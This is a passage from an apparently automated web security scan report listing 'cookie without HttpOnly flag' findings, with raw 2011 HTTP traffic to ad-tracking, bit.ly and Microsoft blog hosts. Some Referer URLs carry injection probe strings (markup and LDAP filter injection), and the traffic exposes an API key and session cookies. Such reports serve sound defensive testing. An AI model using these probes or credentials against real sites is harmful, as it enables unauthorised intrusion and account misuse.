Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:29:40 GMT
X-DirectServer: whitepg_DS4
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: AA002=0-0; expires=Sun, 30 Jan 2011 01:30:40 GMT; path=/; domain=atl.whitepages.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: http://redcated/PTR/jview/240321567/direct;wi.1;hi.1/01?relocate=http://atl.whitepages.com//AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link


17.99. http://atl.whitepages.com/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link HTTP/1.1
Host: atl.whitepages.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:29:40 GMT
X-DirectServer: whitepg_DS5
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: /LSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link


17.100. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?rn=1296343586482&c7=http%3A%2F%2Fwww.redacted%2F&c1=2&c2=3000001 HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: b.scorecardresearch.com
Proxy-Connection: Keep-Alive
Cookie: UID=5d4473db-24.143.206.162-1293844712

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sat, 29 Jan 2011 23:26:31 GMT
Connection: close
Set-Cookie: UID=5d4473db-24.143.206.162-1293844712; expires=Mon, 28-Jan-2013 23:26:31 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


17.101. http://b.scorecardresearch.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=3000001&d.c=gif&d.o=msnbcom&d.x=212602874&d.t=page&d.u=http%3A%2F%2Fphotoblog.msnbc.msn.com%2F_news%2F2011%2F01%2Fad5b7d32bfbc5f43%29%28sn%3D*%2F5942494-double-whammy-on-the-sun%3Fgt1%3D43001&d.r=http%3A%2F%2Fburp%2Fshow%2F3 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 30 Jan 2011 01:19:41 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 29-Jan-2013 01:19:41 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

17.102. http://b.voicefive.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p85001580&c3=58087454&c4=40401740&c5=1&c6=39&c7=wed%20jan%2026%2020%3A14%3A29%202011&c8=http%3A%2F%2Fad.doubleclick.net%2Fadi%2FN3867.270604.B3%2FB5128597.7%3Bsz%3D728x90%3Bclick0%3Dhttp%3A%2F%2Fr1-ads.ace.advertising.com%2Fclick%2Fsite%3D0000730461%2Fmnum%3D0000950192%2Fcstr%3D12110217%3D_4d44bf07%2C6566708061%2C730461_950192_1183_0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fbnum%3D12110217%2Foptn%3D64%3Ftrg%3Dhttp%3A%2F%2Fb3.mookie1.com%2FRealMedia%2Fads%2Fclick_lx.ads%2FAOLB3%2FRadioShack%2FSELL_2011Q1%2FCPA%2F728%2FL36%2F860849269%2Fx90%2FUSNetwork%2FRS_SELL_2011Q1_AOL_CPA_728%2FRadioShack_SELL_2011Q1.html%2F72634857383030695a694d41416f6366%3F%3Bord%3D860849269%3F&c9=Advertisement&c10=http%3A%2F%2Fmsn.whitepages.com%2F&c15=&1296351004927 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; UID=1d29d89e-72.246.30.75-1294456810; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; BMX_G=method->-1,ts->1296351006; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 30 Jan 2011 01:30:06 GMT
Connection: close
Set-Cookie: UID=1d29d89e-72.246.30.75-1294456810; expires=Tue, 29-Jan-2013 01:30:06 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


17.103. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90?http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; ATTWL=CollectiveB3; session=1296350849|1296350849

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:29:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3183
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,
...[SNIP]...

17.104. http://bit.ly/javascript-api.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bit.ly
Path:   /javascript-api.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /javascript-api.js?version=1.02&login=sciam&apiKey=R_4f0af26579dbeb7e65abbf25664a9b49&history=1 HTTP/1.1
Host: bit.ly
Proxy-Connection: keep-alive
Referer: http://www.scientificamerican.com/blog/observations/?9edcb%22%3E%3Ca%3E429173c9aec=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 17:14:48 GMT
Content-Type: application/x-javascript; charset=utf-8
Connection: keep-alive
Pragma: no-cache
Expires: Sun, 30-Jan-2011 14:14:48 GMT
Allow: GET, HEAD, POST
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: CP="CAO PSA OUR"
Set-Cookie: _xsrf=9d5ed86efd7f475d985ae3585609dd41; Path=/
Content-Length: 8436

if (typeof(BitlyApi) == 'undefined')
var BitlyApi = {}; // BitlyApi namespace. You sholdn't need to access methods here. Instead, use an instance of BitlyApiClient().

if (typeof(BitlyCB) == 'unde
...[SNIP]...

17.105. http://blogs.msdn.com/b/delay/archive/2011/01/27/sudo-localize-amp-amp-make-me-a-sandwich-free-pseudolocalizer-class-makes-it-easy-for-anyone-to-identify-potential-localization-issues-in-net-applications.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /b/delay/archive/2011/01/27/sudo-localize-amp-amp-make-me-a-sandwich-free-pseudolocalizer-class-makes-it-easy-for-anyone-to-identify-potential-localization-issues-in-net-applications.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/delay/archive/2011/01/27/sudo-localize-amp-amp-make-me-a-sandwich-free-pseudolocalizer-class-makes-it-easy-for-anyone-to-identify-potential-localization-issues-in-net-applications.aspx HTTP/1.1
Host: blogs.msdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+29+Jan+2011+23%3a22%3a07+GMT; expires=Sun, 29-Jan-2012 23:22:07 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-1001=; path=/
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN
X-Pingback: http://blogs.msdn.com/b/delay/pingback.aspx
X-AspNet-Version: 2.0.50727
Set-Cookie: AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; expires=Sun, 30-Jan-2011 23:22:07 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 29 Jan 2011 23:22:07 GMT
Content-Length: 75605


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

17.106. http://blogs.silverlight.net/ScriptResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.silverlight.net
Path:   /ScriptResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ScriptResource.axd HTTP/1.1
Host: blogs.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:23:02 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e; s_sq=%5B%5BB%5D%5D; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 315
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:40:58 GMT; expires=Sun, 29-Jan-2012 23:40:58 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:40:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</title><
...[SNIP]...

17.107. http://blogs.silverlight.net/WebResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.silverlight.net
Path:   /WebResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WebResource.axd HTTP/1.1
Host: blogs.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:23:02 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e; s_sq=%5B%5BB%5D%5D; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 315
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:40:55 GMT; expires=Sun, 29-Jan-2012 23:40:55 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:40:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</title><
...[SNIP]...

17.108. http://blogs.silverlight.net/showcasehosted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.silverlight.net
Path:   /showcasehosted/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /showcasehosted/ HTTP/1.1
Host: blogs.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/showcase/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/learn/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:33 GMT; expires=Sun, 29-Jan-2012 23:16:33 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-2101=; path=/
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:33 GMT; expires=Sun, 29-Jan-2012 23:16:33 GMT; path=/
Set-Cookie: ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45; path=/; HttpOnly
Set-Cookie: CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e; expires=Sat, 29-Jan-2011 23:36:33 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:33 GMT
Content-Length: 8701


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="X-UA-C
...[SNIP]...

17.109. http://blogs.silverlight.net/showcasehosted/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.silverlight.net
Path:   /showcasehosted/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /showcasehosted/default.aspx HTTP/1.1
Host: blogs.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:23:02 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e; s_sq=%5B%5BB%5D%5D; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 8701
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:40:31 GMT; expires=Sun, 29-Jan-2012 23:40:31 GMT; path=/
Set-Cookie: CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e; expires=Sun, 30-Jan-2011 00:00:31 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:40:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="X-UA-C
...[SNIP]...

17.110. http://blogs.silverlight.net/showcasehosted/resources/services/BasicService.svc/GetAdvertisements

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.silverlight.net
Path:   /showcasehosted/resources/services/BasicService.svc/GetAdvertisements

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /showcasehosted/resources/services/BasicService.svc/GetAdvertisements HTTP/1.1
Host: blogs.silverlight.net
Proxy-Connection: keep-alive
Referer: http://blogs.silverlight.net/showcasehosted/
Origin: http://blogs.silverlight.net
Content-Type: application/json; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:22:47 GMT; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e
Content-Length: 0

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 412
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:22:59 GMT; expires=Sun, 29-Jan-2012 23:22:59 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:22:59 GMT

{"d":[{"__type":"Advertisement:#SAW_WebService","advertisement_id":1,"source_type":null,"format":null,"url":"http:\/\/ads.asp.net\/ads\/Telerik-FreeSL-300x250.jpg","click_url":"http:\/\/www.telerik.co
...[SNIP]...

17.111. http://blogs.silverlight.net/showcasehosted/resources/services/BasicService.svc/GetCountries

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.silverlight.net
Path:   /showcasehosted/resources/services/BasicService.svc/GetCountries

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /showcasehosted/resources/services/BasicService.svc/GetCountries HTTP/1.1
Host: blogs.silverlight.net
Proxy-Connection: keep-alive
Referer: http://blogs.silverlight.net/showcasehosted/
Origin: http://blogs.silverlight.net
Content-Type: application/json; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:22:59 GMT
Content-Length: 0

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9070
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:23:00 GMT; expires=Sun, 29-Jan-2012 23:23:00 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:23:01 GMT

{"d":[{"__type":"Location:#SAW_WebService","location_id":710,"region":"default","country_code":"ZA","country":"South Africa","parent_location_id":null},{"__type":"Location:#SAW_WebService","location_i
...[SNIP]...

